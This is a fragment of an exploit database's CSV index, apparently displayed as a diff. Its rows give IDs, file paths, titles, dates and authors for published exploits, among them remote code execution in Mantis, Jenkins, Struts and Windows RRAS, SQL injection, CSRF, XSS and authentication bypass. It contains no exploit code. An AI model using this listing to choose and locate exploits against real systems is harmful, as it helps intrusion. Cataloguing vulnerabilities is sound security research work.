44611,exploits/php/remote/44611.rb,"Mantis 1.1.3 - 'manage_proj_page' PHP Code Execution (Metasploit)",2018-05-10,Metasploit,remote,php,80
44616,exploits/windows/remote/44616.py,"Microsoft Windows 2003 SP2 - 'RRAS' SMB Remote Code Execution",2018-05-13,vportal,remote,windows,
44635,exploits/hardware/remote/44635.py,"Inteno IOPSYS 2.0 - 4.2.0 p910nd - Remote Command Execution",2018-05-16,neonsea,remote,hardware,9100
44635,exploits/hardware/remote/44635.py,"Inteno IOPSYS 2.0 < 4.2.0 - 'p910nd' Remote Command Execution",2018-05-16,neonsea,remote,hardware,9100
44638,exploits/windows/remote/44638.txt,"Nanopool Claymore Dual Miner 7.3 - Remote Code Execution",2018-05-17,ReverseBrain,remote,windows,
44642,exploits/linux/remote/44642.rb,"Jenkins CLI - HTTP Java Deserialization (Metasploit)",2018-05-17,Metasploit,remote,linux,8080
44643,exploits/multiple/remote/44643.rb,"Apache Struts 2 - Struts 1 Plugin Showcase OGNL Code Execution (Metasploit)",2018-05-17,Metasploit,remote,multiple,8080
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -39321,3 +39325,7 @@ id,file,description,date,author,type,platform,port
44631,exploits/asp/webapps/44631.html,"totemomail Encryption Gateway 6.0.0 Build 371 - Cross-Site Request Forgery",2018-05-16,"Compass Security",webapps,asp,
44632,exploits/php/webapps/44632.html,"WordPress Plugin Metronet Tag Manager 1.2.7 - Cross-Site Request Forgery",2018-05-16,dxw,webapps,php,80
44634,exploits/java/webapps/44634.txt,"RSA Authentication Manager 8.2.1.4.0-build1394922 / < 8.3 P1 - XML External Entity Injection / Cross-Site Flashing / DOM Cross-Site Scripting",2018-05-16,"SEC Consult",webapps,java,
44636,exploits/php/webapps/44636.txt,"NodAPS 4.0 - SQL injection / Cross-Site Request Forgery",2018-05-17,L0RD,webapps,php,
44637,exploits/hardware/webapps/44637.py,"Intelbras NCLOUD 300 1.0 - Authentication bypass",2018-05-17,"Pedro Aguiar",webapps,hardware,
44639,exploits/php/webapps/44639.txt,"SuperCom Online Shopping Ecommerce Cart 1 - Persistent Cross-Site scripting / Cross site request forgery / Authentication bypass",2018-05-17,L0RD,webapps,php,
44640,exploits/linux/webapps/44640.txt,"Powerlogic/Schneider Electric IONXXXX Series - Cross-Site Request Forgery",2018-05-17,t4rkd3vilz,webapps,linux,

Can't render this file because it is too large.